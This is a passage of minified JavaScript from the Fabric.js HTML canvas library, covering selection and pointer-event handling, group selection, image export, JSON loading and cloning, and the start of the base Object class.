this.contextTop},_createCacheCanvas:function(){this.cacheCanvasEl=this._createCanvasElement(),this.cacheCanvasEl.setAttribute("width",this.width),this.cacheCanvasEl.setAttribute("height",this.height),this.contextCache=this.cacheCanvasEl.getContext("2d")},_initWrapperElement:function(){this.wrapperEl=j.util.wrapElement(this.lowerCanvasEl,"div",{class:this.containerClass}),j.util.setStyle(this.wrapperEl,{width:this.width+"px",height:this.height+"px",position:"relative"}),j.util.makeElementUnselectable(this.wrapperEl)},_applyCanvasStyle:function(y){var M=this.width||y.width,p=this.height||y.height;j.util.setStyle(y,{position:"absolute",width:M+"px",height:p+"px",left:0,top:0,"touch-action":this.allowTouchScrolling?"manipulation":"none","-ms-touch-action":this.allowTouchScrolling?"manipulation":"none"}),y.width=M,y.height=p,j.util.makeElementUnselectable(y)},_copyCanvasStyle:function(y,M){M.style.cssText=y.style.cssText},getSelectionContext:function(){return this.contextTop},getSelectionElement:function(){return this.upperCanvasEl},getActiveObject:function(){return this._activeObject},getActiveObjects:function(){var y=this._activeObject;return y?"activeSelection"===y.type&&y._objects?y._objects.slice(0):[y]:[]},_onObjectRemoved:function(y){y===this._activeObject&&(this.fire("before:selection:cleared",{target:y}),this._discardActiveObject(),this.fire("selection:cleared",{target:y}),y.fire("deselected")),y===this._hoveredTarget&&(this._hoveredTarget=null,this._hoveredTargets=[]),this.callSuper("_onObjectRemoved",y)},_fireSelectionEvents:function(y,M){var p=!1,D=this.getActiveObjects(),w=[],x=[];y.forEach(function(S){-1===D.indexOf(S)&&(p=!0,S.fire("deselected",{e:M,target:S}),x.push(S))}),D.forEach(function(S){-1===y.indexOf(S)&&(p=!0,S.fire("selected",{e:M,target:S}),w.push(S))}),y.length>0&&D.length>0?p&&this.fire("selection:updated",{e:M,selected:w,deselected:x}):D.length>0?this.fire("selection:created",{e:M,selected:w}):y.length>0&&this.fire("selection:cleared",{e:M,deselected:x})},setActiveObject:function(y,M){var p=this.getActiveObjects();return this._setActiveObject(y,M),this._fireSelectionEvents(p,M),this},_setActiveObject:function(y,M){return!(this._activeObject===y||!this._discardActiveObject(M,y)||y.onSelect({e:M})||(this._activeObject=y,0))},_discardActiveObject:function(y,M){var p=this._activeObject;if(p){if(p.onDeselect({e:y,object:M}))return!1;this._activeObject=null}return!0},discardActiveObject:function(y){var M=this.getActiveObjects(),p=this.getActiveObject();return M.length&&this.fire("before:selection:cleared",{target:p,e:y}),this._discardActiveObject(y),this._fireSelectionEvents(M,y),this},dispose:function(){var y=this.wrapperEl;return this.removeListeners(),y.removeChild(this.upperCanvasEl),y.removeChild(this.lowerCanvasEl),this.contextCache=null,this.contextTop=null,["upperCanvasEl","cacheCanvasEl"].forEach(function(M){j.util.cleanUpJsdomNode(this[M]),this[M]=void 0}.bind(this)),y.parentNode&&y.parentNode.replaceChild(this.lowerCanvasEl,this.wrapperEl),delete this.wrapperEl,j.StaticCanvas.prototype.dispose.call(this),this},clear:function(){return this.discardActiveObject(),this.clearContext(this.contextTop),this.callSuper("clear")},drawControls:function(y){var M=this._activeObject;M&&M._renderControls(y)},_toObject:function(y,M,p){var D=this._realizeGroupTransformOnObject(y),w=this.callSuper("_toObject",y,M,p);return this._unwindGroupTransformOnObject(y,D),w},_realizeGroupTransformOnObject:function(y){if(y.group&&"activeSelection"===y.group.type&&this._activeObject===y.group){var p={};return["angle","flipX","flipY","left","scaleX","scaleY","skewX","skewY","top"].forEach(function(D){p[D]=y[D]}),j.util.addTransformToObject(y,this._activeObject.calcOwnMatrix()),p}return null},_unwindGroupTransformOnObject:function(y,M){M&&y.set(M)},_setSVGObject:function(y,M,p){var D=this._realizeGroupTransformOnObject(M);this.callSuper("_setSVGObject",y,M,p),this._unwindGroupTransformOnObject(M,D)},setViewportTransform:function(y){this.renderOnAddRemove&&this._activeObject&&this._activeObject.isEditing&&this._activeObject.clearContextTop(),j.StaticCanvas.prototype.setViewportTransform.call(this,y)}}),j.StaticCanvas)"prototype"!==_&&(j.Canvas[_]=j.StaticCanvas[_])}(),function(){var E=j.util.addListener,g=j.util.removeListener,M={passive:!1};function p(D,w){return D.button&&D.button===w-1}j.util.object.extend(j.Canvas.prototype,{mainTouchId:null,_initEventListeners:function(){this.removeListeners(),this._bindEvents(),this.addOrRemove(E,"add")},_getEventPrefix:function(){return this.enablePointerEvents?"pointer":"mouse"},addOrRemove:function(D,w){var x=this.upperCanvasEl,S=this._getEventPrefix();D(j.window,"resize",this._onResize),D(x,S+"down",this._onMouseDown),D(x,S+"move",this._onMouseMove,M),D(x,S+"out",this._onMouseOut),D(x,S+"enter",this._onMouseEnter),D(x,"wheel",this._onMouseWheel),D(x,"contextmenu",this._onContextMenu),D(x,"dblclick",this._onDoubleClick),D(x,"dragover",this._onDragOver),D(x,"dragenter",this._onDragEnter),D(x,"dragleave",this._onDragLeave),D(x,"drop",this._onDrop),this.enablePointerEvents||D(x,"touchstart",this._onTouchStart,M),"undefined"!=typeof eventjs&&w in eventjs&&(eventjs[w](x,"gesture",this._onGesture),eventjs[w](x,"drag",this._onDrag),eventjs[w](x,"orientation",this._onOrientationChange),eventjs[w](x,"shake",this._onShake),eventjs[w](x,"longpress",this._onLongPress))},removeListeners:function(){this.addOrRemove(g,"remove");var D=this._getEventPrefix();g(j.document,D+"up",this._onMouseUp),g(j.document,"touchend",this._onTouchEnd,M),g(j.document,D+"move",this._onMouseMove,M),g(j.document,"touchmove",this._onMouseMove,M)},_bindEvents:function(){this.eventsBound||(this._onMouseDown=this._onMouseDown.bind(this),this._onTouchStart=this._onTouchStart.bind(this),this._onMouseMove=this._onMouseMove.bind(this),this._onMouseUp=this._onMouseUp.bind(this),this._onTouchEnd=this._onTouchEnd.bind(this),this._onResize=this._onResize.bind(this),this._onGesture=this._onGesture.bind(this),this._onDrag=this._onDrag.bind(this),this._onShake=this._onShake.bind(this),this._onLongPress=this._onLongPress.bind(this),this._onOrientationChange=this._onOrientationChange.bind(this),this._onMouseWheel=this._onMouseWheel.bind(this),this._onMouseOut=this._onMouseOut.bind(this),this._onMouseEnter=this._onMouseEnter.bind(this),this._onContextMenu=this._onContextMenu.bind(this),this._onDoubleClick=this._onDoubleClick.bind(this),this._onDragOver=this._onDragOver.bind(this),this._onDragEnter=this._simpleEventHandler.bind(this,"dragenter"),this._onDragLeave=this._simpleEventHandler.bind(this,"dragleave"),this._onDrop=this._onDrop.bind(this),this.eventsBound=!0)},_onGesture:function(D,w){this.__onTransformGesture&&this.__onTransformGesture(D,w)},_onDrag:function(D,w){this.__onDrag&&this.__onDrag(D,w)},_onMouseWheel:function(D){this.__onMouseWheel(D)},_onMouseOut:function(D){var w=this._hoveredTarget;this.fire("mouse:out",{target:w,e:D}),this._hoveredTarget=null,w&&w.fire("mouseout",{e:D});var x=this;this._hoveredTargets.forEach(function(S){x.fire("mouse:out",{target:w,e:D}),S&&w.fire("mouseout",{e:D})}),this._hoveredTargets=[]},_onMouseEnter:function(D){!this._currentTransform&&!this.findTarget(D)&&(this.fire("mouse:over",{target:null,e:D}),this._hoveredTarget=null,this._hoveredTargets=[])},_onOrientationChange:function(D,w){this.__onOrientationChange&&this.__onOrientationChange(D,w)},_onShake:function(D,w){this.__onShake&&this.__onShake(D,w)},_onLongPress:function(D,w){this.__onLongPress&&this.__onLongPress(D,w)},_onDragOver:function(D){D.preventDefault();var w=this._simpleEventHandler("dragover",D);this._fireEnterLeaveEvents(w,D)},_onDrop:function(D){return this._simpleEventHandler("drop:before",D),this._simpleEventHandler("drop",D)},_onContextMenu:function(D){return this.stopContextMenu&&(D.stopPropagation(),D.preventDefault()),!1},_onDoubleClick:function(D){this._cacheTransformEventData(D),this._handleEvent(D,"dblclick"),this._resetTransformEventData(D)},getPointerId:function(D){var w=D.changedTouches;return w?w[0]&&w[0].identifier:this.enablePointerEvents?D.pointerId:-1},_isMainEvent:function(D){return!0===D.isPrimary||!1!==D.isPrimary&&("touchend"===D.type&&0===D.touches.length||!D.changedTouches||D.changedTouches[0].identifier===this.mainTouchId)},_onTouchStart:function(D){D.preventDefault(),null===this.mainTouchId&&(this.mainTouchId=this.getPointerId(D)),this.__onMouseDown(D),this._resetTransformEventData();var w=this.upperCanvasEl,x=this._getEventPrefix();E(j.document,"touchend",this._onTouchEnd,M),E(j.document,"touchmove",this._onMouseMove,M),g(w,x+"down",this._onMouseDown)},_onMouseDown:function(D){this.__onMouseDown(D),this._resetTransformEventData();var w=this.upperCanvasEl,x=this._getEventPrefix();g(w,x+"move",this._onMouseMove,M),E(j.document,x+"up",this._onMouseUp),E(j.document,x+"move",this._onMouseMove,M)},_onTouchEnd:function(D){if(!(D.touches.length>0)){this.__onMouseUp(D),this._resetTransformEventData(),this.mainTouchId=null;var w=this._getEventPrefix();g(j.document,"touchend",this._onTouchEnd,M),g(j.document,"touchmove",this._onMouseMove,M);var x=this;this._willAddMouseDown&&clearTimeout(this._willAddMouseDown),this._willAddMouseDown=setTimeout(function(){E(x.upperCanvasEl,w+"down",x._onMouseDown),x._willAddMouseDown=0},400)}},_onMouseUp:function(D){this.__onMouseUp(D),this._resetTransformEventData();var w=this.upperCanvasEl,x=this._getEventPrefix();this._isMainEvent(D)&&(g(j.document,x+"up",this._onMouseUp),g(j.document,x+"move",this._onMouseMove,M),E(w,x+"move",this._onMouseMove,M))},_onMouseMove:function(D){!this.allowTouchScrolling&&D.preventDefault&&D.preventDefault(),this.__onMouseMove(D)},_onResize:function(){this.calcOffset()},_shouldRender:function(D){var w=this._activeObject;return!!(!!w!=!!D||w&&D&&w!==D)},__onMouseUp:function(D){var w,x=this._currentTransform,S=this._groupSelector,O=!1,U=!S||0===S.left&&0===S.top;if(this._cacheTransformEventData(D),w=this._target,this._handleEvent(D,"up:before"),p(D,3))this.fireRightClick&&this._handleEvent(D,"up",3,U);else{if(p(D,2))return this.fireMiddleClick&&this._handleEvent(D,"up",2,U),void this._resetTransformEventData();if(this.isDrawingMode&&this._isCurrentlyDrawing)this._onMouseUpInDrawingMode(D);else if(this._isMainEvent(D)){if(x&&(this._finalizeCurrentTransform(D),O=x.actionPerformed),!U){var K=w===this._activeObject;this._maybeGroupObjects(D),O||(O=this._shouldRender(w)||!K&&w===this._activeObject)}var ee,se;if(w){if(ee=w._findTargetCorner(this.getPointer(D,!0),j.util.isTouchEvent(D)),w.selectable&&w!==this._activeObject&&"up"===w.activeOn)this.setActiveObject(w,D),O=!0;else{var ve=w.controls[ee],le=ve&&ve.getMouseUpHandler(D,w,ve);le&&le(D,x,(se=this.getPointer(D)).x,se.y)}w.isMoving=!1}if(x&&(x.target!==w||x.corner!==ee)){var ye=x.target&&x.target.controls[x.corner],z=ye&&ye.getMouseUpHandler(D,w,ve);se=se||this.getPointer(D),z&&z(D,x,se.x,se.y)}this._setCursorFromEvent(D,w),this._handleEvent(D,"up",1,U),this._groupSelector=null,this._currentTransform=null,w&&(w.__corner=0),O?this.requestRenderAll():U||this.renderTop()}}},_simpleEventHandler:function(D,w){var x=this.findTarget(w),S=this.targets,O={e:w,target:x,subTargets:S};if(this.fire(D,O),x&&x.fire(D,O),!S)return x;for(var U=0;U<S.length;U++)S[U].fire(D,O);return x},_handleEvent:function(D,w,x,S){var O=this._target,U=this.targets||[],K={e:D,target:O,subTargets:U,button:x||1,isClick:S||!1,pointer:this._pointer,absolutePointer:this._absolutePointer,transform:this._currentTransform};"up"===w&&(K.currentTarget=this.findTarget(D),K.currentSubTargets=this.targets),this.fire("mouse:"+w,K),O&&O.fire("mouse"+w,K);for(var ee=0;ee<U.length;ee++)U[ee].fire("mouse"+w,K)},_finalizeCurrentTransform:function(D){var w=this._currentTransform,x=w.target,S={e:D,target:x,transform:w,action:w.action};x._scaling&&(x._scaling=!1),x.setCoords(),(w.actionPerformed||this.stateful&&x.hasStateChanged())&&this._fire("modified",S)},_onMouseDownInDrawingMode:function(D){this._isCurrentlyDrawing=!0,this.getActiveObject()&&this.discardActiveObject(D).requestRenderAll();var w=this.getPointer(D);this.freeDrawingBrush.onMouseDown(w,{e:D,pointer:w}),this._handleEvent(D,"down")},_onMouseMoveInDrawingMode:function(D){if(this._isCurrentlyDrawing){var w=this.getPointer(D);this.freeDrawingBrush.onMouseMove(w,{e:D,pointer:w})}this.setCursor(this.freeDrawingCursor),this._handleEvent(D,"move")},_onMouseUpInDrawingMode:function(D){var w=this.getPointer(D);this._isCurrentlyDrawing=this.freeDrawingBrush.onMouseUp({e:D,pointer:w}),this._handleEvent(D,"up")},__onMouseDown:function(D){this._cacheTransformEventData(D),this._handleEvent(D,"down:before");var w=this._target;if(p(D,3))this.fireRightClick&&this._handleEvent(D,"down",3);else if(p(D,2))this.fireMiddleClick&&this._handleEvent(D,"down",2);else if(this.isDrawingMode)this._onMouseDownInDrawingMode(D);else if(this._isMainEvent(D)&&!this._currentTransform){this._previousPointer=x=this._pointer;var S=this._shouldRender(w),O=this._shouldGroup(D,w);if(this._shouldClearSelection(D,w)?this.discardActiveObject(D):O&&(this._handleGrouping(D,w),w=this._activeObject),this.selection&&(!w||!w.selectable&&!w.isEditing&&w!==this._activeObject)&&(this._groupSelector={ex:this._absolutePointer.x,ey:this._absolutePointer.y,top:0,left:0}),w){var U=w===this._activeObject;w.selectable&&"down"===w.activeOn&&this.setActiveObject(w,D);var K=w._findTargetCorner(this.getPointer(D,!0),j.util.isTouchEvent(D));if(w.__corner=K,w===this._activeObject&&(K||!O)){this._setupCurrentTransform(D,w,U);var ee=w.controls[K],x=this.getPointer(D),se=ee&&ee.getMouseDownHandler(D,w,ee);se&&se(D,this._currentTransform,x.x,x.y)}}this._handleEvent(D,"down"),(S||O)&&this.requestRenderAll()}},_resetTransformEventData:function(){this._target=null,this._pointer=null,this._absolutePointer=null},_cacheTransformEventData:function(D){this._resetTransformEventData(),this._pointer=this.getPointer(D,!0),this._absolutePointer=this.restorePointerVpt(this._pointer),this._target=this._currentTransform?this._currentTransform.target:this.findTarget(D)||null},_beforeTransform:function(D){var w=this._currentTransform;this.stateful&&w.target.saveState(),this.fire("before:transform",{e:D,transform:w})},__onMouseMove:function(D){var w,x;if(this._handleEvent(D,"move:before"),this._cacheTransformEventData(D),this.isDrawingMode)this._onMouseMoveInDrawingMode(D);else if(this._isMainEvent(D)){var S=this._groupSelector;S?(S.left=(x=this._absolutePointer).x-S.ex,S.top=x.y-S.ey,this.renderTop()):this._currentTransform?this._transformObject(D):(w=this.findTarget(D)||null,this._setCursorFromEvent(D,w),this._fireOverOutEvents(w,D)),this._handleEvent(D,"move"),this._resetTransformEventData()}},_fireOverOutEvents:function(D,w){var x=this._hoveredTarget,S=this._hoveredTargets,O=this.targets,U=Math.max(S.length,O.length);this.fireSyntheticInOutEvents(D,w,{oldTarget:x,evtOut:"mouseout",canvasEvtOut:"mouse:out",evtIn:"mouseover",canvasEvtIn:"mouse:over"});for(var K=0;K<U;K++)this.fireSyntheticInOutEvents(O[K],w,{oldTarget:S[K],evtOut:"mouseout",evtIn:"mouseover"});this._hoveredTarget=D,this._hoveredTargets=this.targets.concat()},_fireEnterLeaveEvents:function(D,w){var x=this._draggedoverTarget,S=this._hoveredTargets,O=this.targets,U=Math.max(S.length,O.length);this.fireSyntheticInOutEvents(D,w,{oldTarget:x,evtOut:"dragleave",evtIn:"dragenter"});for(var K=0;K<U;K++)this.fireSyntheticInOutEvents(O[K],w,{oldTarget:S[K],evtOut:"dragleave",evtIn:"dragenter"});this._draggedoverTarget=D},fireSyntheticInOutEvents:function(D,w,x){var S,O,ee,U=x.oldTarget,se=U!==D,ve=x.canvasEvtIn,le=x.canvasEvtOut;se&&(S={e:w,target:D,previousTarget:U},O={e:w,target:U,nextTarget:D}),ee=D&&se,U&&se&&(le&&this.fire(le,O),U.fire(x.evtOut,O)),ee&&(ve&&this.fire(ve,S),D.fire(x.evtIn,S))},__onMouseWheel:function(D){this._cacheTransformEventData(D),this._handleEvent(D,"wheel"),this._resetTransformEventData()},_transformObject:function(D){var w=this.getPointer(D),x=this._currentTransform;x.reset=!1,x.shiftKey=D.shiftKey,x.altKey=D[this.centeredKey],this._performTransformAction(D,x,w),x.actionPerformed&&this.requestRenderAll()},_performTransformAction:function(D,w,x){var U=w.action,K=!1,ee=w.actionHandler;ee&&(K=ee(D,w,x.x,x.y)),"drag"===U&&K&&(w.target.isMoving=!0,this.setCursor(w.target.moveCursor||this.moveCursor)),w.actionPerformed=w.actionPerformed||K},_fire:j.controlsUtils.fireEvent,_setCursorFromEvent:function(D,w){if(!w)return this.setCursor(this.defaultCursor),!1;var x=w.hoverCursor||this.hoverCursor,S=this._activeObject&&"activeSelection"===this._activeObject.type?this._activeObject:null,O=(!S||!S.contains(w))&&w._findTargetCorner(this.getPointer(D,!0));O?this.setCursor(this.getCornerCursor(O,w,D)):(w.subTargetCheck&&this.targets.concat().reverse().map(function(U){x=U.hoverCursor||x}),this.setCursor(x))},getCornerCursor:function(D,w,x){var S=w.controls[D];return S.cursorStyleHandler(x,S,w)}})}(),function(){var E=Math.min,g=Math.max;j.util.object.extend(j.Canvas.prototype,{_shouldGroup:function(b,_){var y=this._activeObject;return y&&this._isSelectionKeyPressed(b)&&_&&_.selectable&&this.selection&&(y!==_||"activeSelection"===y.type)&&!_.onSelect({e:b})},_handleGrouping:function(b,_){var y=this._activeObject;y.__corner||_===y&&(!(_=this.findTarget(b,!0))||!_.selectable)||(y&&"activeSelection"===y.type?this._updateActiveSelection(_,b):this._createActiveSelection(_,b))},_updateActiveSelection:function(b,_){var y=this._activeObject,M=y._objects.slice(0);y.contains(b)?(y.removeWithUpdate(b),this._hoveredTarget=b,this._hoveredTargets=this.targets.concat(),1===y.size()&&this._setActiveObject(y.item(0),_)):(y.addWithUpdate(b),this._hoveredTarget=y,this._hoveredTargets=this.targets.concat()),this._fireSelectionEvents(M,_)},_createActiveSelection:function(b,_){var y=this.getActiveObjects(),M=this._createGroup(b);this._hoveredTarget=M,this._setActiveObject(M,_),this._fireSelectionEvents(y,_)},_createGroup:function(b){var _=this._objects,M=_.indexOf(this._activeObject)<_.indexOf(b)?[this._activeObject,b]:[b,this._activeObject];return this._activeObject.isEditing&&this._activeObject.exitEditing(),new j.ActiveSelection(M,{canvas:this})},_groupSelectedObjects:function(b){var y,_=this._collectObjects(b);1===_.length?this.setActiveObject(_[0],b):_.length>1&&(y=new j.ActiveSelection(_.reverse(),{canvas:this}),this.setActiveObject(y,b))},_collectObjects:function(b){for(var y,_=[],M=this._groupSelector.ex,p=this._groupSelector.ey,D=M+this._groupSelector.left,w=p+this._groupSelector.top,x=new j.Point(E(M,D),E(p,w)),S=new j.Point(g(M,D),g(p,w)),O=!this.selectionFullyContained,U=M===D&&p===w,K=this._objects.length;K--&&!((y=this._objects[K])&&y.selectable&&y.visible&&(O&&y.intersectsWithRect(x,S,!0)||y.isContainedWithinRect(x,S,!0)||O&&y.containsPoint(x,null,!0)||O&&y.containsPoint(S,null,!0))&&(_.push(y),U)););return _.length>1&&(_=_.filter(function(ee){return!ee.onSelect({e:b})})),_},_maybeGroupObjects:function(b){this.selection&&this._groupSelector&&this._groupSelectedObjects(b),this.setCursor(this.defaultCursor),this._groupSelector=null}})}(),j.util.object.extend(j.StaticCanvas.prototype,{toDataURL:function(E){E||(E={});var g=E.format||"png",b=E.quality||1,_=(E.multiplier||1)*(E.enableRetinaScaling?this.getRetinaScaling():1),y=this.toCanvasElement(_,E);return j.util.toDataURL(y,g,b)},toCanvasElement:function(E,g){var b=((g=g||{}).width||this.width)*(E=E||1),_=(g.height||this.height)*E,y=this.getZoom(),M=this.width,p=this.height,D=y*E,w=this.viewportTransform,O=this.interactive,U=[D,0,0,D,(w[4]-(g.left||0))*E,(w[5]-(g.top||0))*E],K=this.enableRetinaScaling,ee=j.util.createCanvasElement(),se=this.contextTop;return ee.width=b,ee.height=_,this.contextTop=null,this.enableRetinaScaling=!1,this.interactive=!1,this.viewportTransform=U,this.width=b,this.height=_,this.calcViewportBoundaries(),this.renderCanvas(ee.getContext("2d"),this._objects),this.viewportTransform=w,this.width=M,this.height=p,this.calcViewportBoundaries(),this.interactive=O,this.enableRetinaScaling=K,this.contextTop=se,ee}}),j.util.object.extend(j.StaticCanvas.prototype,{loadFromJSON:function(E,g,b){if(E){var _="string"==typeof E?JSON.parse(E):j.util.object.clone(E),y=this,M=_.clipPath,p=this.renderOnAddRemove;return this.renderOnAddRemove=!1,delete _.clipPath,this._enlivenObjects(_.objects,function(D){y.clear(),y._setBgOverlay(_,function(){M?y._enlivenObjects([M],function(w){y.clipPath=w[0],y.__setupCanvas.call(y,_,D,p,g)}):y.__setupCanvas.call(y,_,D,p,g)})},b),this}},__setupCanvas:function(E,g,b,_){var y=this;g.forEach(function(M,p){y.insertAt(M,p)}),this.renderOnAddRemove=b,delete E.objects,delete E.backgroundImage,delete E.overlayImage,delete E.background,delete E.overlay,this._setOptions(E),this.renderAll(),_&&_()},_setBgOverlay:function(E,g){var b={backgroundColor:!1,overlayColor:!1,backgroundImage:!1,overlayImage:!1};if(E.backgroundImage||E.overlayImage||E.background||E.overlay){var _=function(){b.backgroundImage&&b.overlayImage&&b.backgroundColor&&b.overlayColor&&g&&g()};this.__setBgOverlay("backgroundImage",E.backgroundImage,b,_),this.__setBgOverlay("overlayImage",E.overlayImage,b,_),this.__setBgOverlay("backgroundColor",E.background,b,_),this.__setBgOverlay("overlayColor",E.overlay,b,_)}else g&&g()},__setBgOverlay:function(E,g,b,_){var y=this;if(!g)return b[E]=!0,void(_&&_());"backgroundImage"===E||"overlayImage"===E?j.util.enlivenObjects([g],function(M){y[E]=M[0],b[E]=!0,_&&_()}):this["set"+j.util.string.capitalize(E,!0)](g,function(){b[E]=!0,_&&_()})},_enlivenObjects:function(E,g,b){E&&0!==E.length?j.util.enlivenObjects(E,function(_){g&&g(_)},null,b):g&&g([])},_toDataURL:function(E,g){this.clone(function(b){g(b.toDataURL(E))})},_toDataURLWithMultiplier:function(E,g,b){this.clone(function(_){b(_.toDataURLWithMultiplier(E,g))})},clone:function(E,g){var b=JSON.stringify(this.toJSON(g));this.cloneWithoutData(function(_){_.loadFromJSON(b,function(){E&&E(_)})})},cloneWithoutData:function(E){var g=j.util.createCanvasElement();g.width=this.width,g.height=this.height;var b=new j.Canvas(g);this.backgroundImage?(b.setBackgroundImage(this.backgroundImage.src,function(){b.renderAll(),E&&E(b)}),b.backgroundImageOpacity=this.backgroundImageOpacity,b.backgroundImageStretch=this.backgroundImageStretch):E&&E(b)}}),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.util.object.clone,y=g.util.toFixed,M=g.util.string.capitalize,p=g.util.degreesToRadians;g.Object||(g.Object=g.util.createClass(g.CommonMethods,{type:"object",originX:"left",originY:"top",top:0,left:0,width:0,height:0,scaleX:1,scaleY:1,flipX:!1,flipY:!1,opacity:1,angle:0,skewX:0,skewY:0,cornerSize:13,touchCornerSize:24,transparentCorners:!0,hoverCursor:null,moveCursor:null,padding:0,borderColor:"rgb(178,204,255)",borderDashArray:null,cornerColor:"rgb(178,204,255)",cornerStrokeColor:null,cornerStyle:"rect",cornerDashArray:null,centeredScaling:!1,centeredRotation:!0,fill:"rgb(0,0,0)",fillRule:"nonzero",globalCompositeOperation:"source-over",backgroundColor:"",selectionBackgroundColor:"",stroke:null,strokeWidth:1,strokeDashArray:null,strokeDashOffset:0,strokeLineCap:"butt",strokeLineJoin:"miter",strokeMiterLimit:4,shadow:null,borderOpacityWhenMoving:.4,borderScaleFactor:1,minScaleLimit:0,selectable:!0,evented:!0,visible:!0,hasControls:!0,hasBorders:!0,perPixelTargetFind:!1,includeDefaultValues:!0,lockMovementX:!1,lockMovementY:!1,lockRotation:!1,lockScalingX:!1,lockScalingY:!1,lockSkewingX:!1,lockSkewingY:!1,lockScalingFlip:!1,excludeFromExport:!1,objectCaching:!g.isLikelyNode,statefullCache:!1,noScaleCache:!0,strokeUniform:!1,dirty:!0,__corner:0,paintFirst:"fill",activeOn:"down",stateProperties:"top left width height scaleX scaleY flipX flipY originX originY transformMatrix stroke strokeWidth strokeDashArray strokeLineCap strokeDashOffset strokeLineJoin strokeMiterLimit angle opacity fill globalCompositeOperation shadow visible backgroundColor skewX skewY fillRule paintFirst clipPath strokeUniform".split(" "),cacheProperties:"fill stroke strokeWidth strokeDashArray width height paintFirst strokeUniform strokeLineCap strokeDashOffset strokeLineJoin strokeMiterLimit backgroundColor clipPath".split(" "),colorProperties:"fill stroke backgroundColor".split(" "),clipPath:void 0,inverted:!1,absolutePositioned:!1,initialize:function(x){x&&this.setOptions(x)},_createCacheCanvas:function(){this._cacheProperties={},this._cacheCanvas=g.util.createCanvasElement(),this._cacheContext=this._cacheCanvas.getContext("2d"),this._updateCacheCanvas(),this.dirty=!0},_limitCacheSize:function(x){var S=g.perfLimitSizeTotal,O=x.width,U=x.height,K=g.maxCacheSideLimit,ee=g.minCacheSideLimit;if(O<=K&&U<=K&&O*U<=S)return O<ee&&(x.width=ee),U<ee&&(x.height=ee),x;var ve=g.util.limitDimsByArea(O/U,S),le=g.util.capValue,ye=le(ee,ve.x,K),z=le(ee,ve.y,K);return O>ye&&(x.zoomX/=O/ye,x.width=ye,x.capped=!0),U>z&&(x.zoomY/=U/z,x.height=z,x.capped=!0),x},_getCacheCanvasDimensions:function(){var x=this.getTotalObjectScaling(),S=this._getTransformedDimensions(0,0),O=S.x*x.scaleX/this.scaleX,U=S.y*x.scaleY/this.scaleY;return{width:O+2,height:U+2,zoomX:x.scaleX,zoomY:x.scaleY,x:O,y:U}},_updateCacheCanvas:function(){var x=this.canvas;if(this.noScaleCache&&x&&x._currentTransform){var O=x._currentTransform.action;if(this===x._currentTransform.target&&O.slice&&"scale"===O.slice(0,5))return!1}var le,ye,U=this._cacheCanvas,K=this._limitCacheSize(this._getCacheCanvasDimensions()),ee=g.minCacheSideLimit,se=K.width,ve=K.height,z=K.zoomX,l=K.zoomY,f=se!==this.cacheWidth||ve!==this.cacheHeight,v=f||this.zoomX!==z||this.zoomY!==l,P=0,G=0,X=!1;if(f){var L=this._cacheCanvas.width,h=this._cacheCanvas.height,R=se>L||ve>h;X=R||(se<.9*L||ve<.9*h)&&L>ee&&h>ee,R&&!K.capped&&(se>ee||ve>ee)&&(P=.1*se,G=.1*ve)}return this instanceof g.Text&&this.path&&(v=!0,X=!0,P+=this.getHeightOfLine(0)*this.zoomX,G+=this.getHeightOfLine(0)*this.zoomY),!!v&&(X?(U.width=Math.ceil(se+P),U.height=Math.ceil(ve+G)):(this._cacheContext.setTransform(1,0,0,1,0,0),this._cacheContext.clearRect(0,0,U.width,U.height)),le=K.x/2,ye=K.y/2,this.cacheTranslationX=Math.round(U.width/2-le)+le,this.cacheTranslationY=Math.round(U.height/2-ye)+ye,this.cacheWidth=se,this.cacheHeight=ve,this._cacheContext.translate(this.cacheTranslationX,this.cacheTranslationY),this._cacheContext.scale(z,l),this.zoomX=z,this.zoomY=l,!0)},setOptions:function(x){this._setOptions(x),this._initGradient(x.fill,"fill"),this._initGradient(x.stroke,"stroke"),this._initPattern(x.fill,"fill"),this._initPattern(x.stroke,"stroke")},transform:function(x){var O=this.calcTransformMatrix(!(this.group&&!this.group._transformDone||this.group&&this.canvas&&x===this.canvas.contextTop));x.transform(O[0],O[1],O[2],O[3],O[4],O[5])},toObject:function(x){var S=g.Object.NUM_FRACTION_DIGITS,O={type:this.type,version:g.version,originX:this.originX,originY:this.originY,left:y(this.left,S),top:y(this.top,S),width:y(this.width,S),height:y(this.height,S),fill:this.fill&&this.fill.toObject?this.fill.toObject():this.fill,stroke:this.stroke&&this.stroke.toObject?this.stroke.toObject():this.stroke,strokeWidth:y(this.strokeWidth,S),strokeDashArray:this.strokeDashArray?this.strokeDashArray.concat():this.strokeDashArray,strokeLineCap:this.strokeLineCap,strokeDashOffset:this.strokeDashOffset,strokeLineJoin:this.strokeLineJoin,strokeUniform:this.strokeUniform,strokeMiterLimit:y(this.strokeMiterLimit,S),scaleX:y(this.scaleX,S),scaleY:y(this.scaleY,S),angle:y(this.angle,S),flipX:this.flipX,flipY:this.flipY,opacity:y(this.opacity,S),shadow:this.shadow&&this.shadow.toObject?this.shadow.toObject():this.shadow,visible:this.visible,backgroundColor:this.backgroundColor,fillRule:this.fillRule,paintFirst:this.paintFirst,globalCompositeOperation:this.globalCompositeOperation,skewX:y(this.skewX,S),skewY:y(this.skewY,S)};return this.clipPath&&!this.clipPath.excludeFromExport&&(O.clipPath=this.clipPath.toObject(x),O.clipPath.inverted=this.clipPath.inverted,O.clipPath.absolutePositioned=this.clipPath.absolutePositioned),g.util.populateWithProperties(this,O,x),this.includeDefaultValues||(O=this._removeDefaultValues(O)),O},toDatalessObject:function(x){return this.toObject(x)},_removeDefaultValues:function(x){var S=g.util.getKlass(x.type).prototype;return S.stateProperties.forEach(function(U){"left"===U||"top"===U||(x[U]===S[U]&&delete x[U],Array.isArray(x[U])&&Array.isArray(S[U])&&0===x[U].length&&0===S[U].length&&delete x[U])}),x},toString:function(){return"#<fabric."+M(this.type)+">"},getObjectScaling:function(){if(!this.group)return{scaleX:this.scaleX,scaleY:this.scaleY};var x=g.util.qrDecompose(this.calcTransformMatrix());return{scaleX:Math.abs(x.scaleX),scaleY:Math.abs(x.scaleY)}},getTotalObjectScaling:function(){var x=this.getObjectScaling(),S=x.scaleX,O=x.scaleY;if(this.canvas){var U=this.canvas.getZoom(),K=this.canvas.getRetinaScaling();S*=U*K,O*=U*K}return{scaleX:S,scaleY:O}},getObjectOpacity:function(){var x=this.opacity;return this.group&&(x*=this.group.getObjectOpacity()),x},_set:function(x,S){var 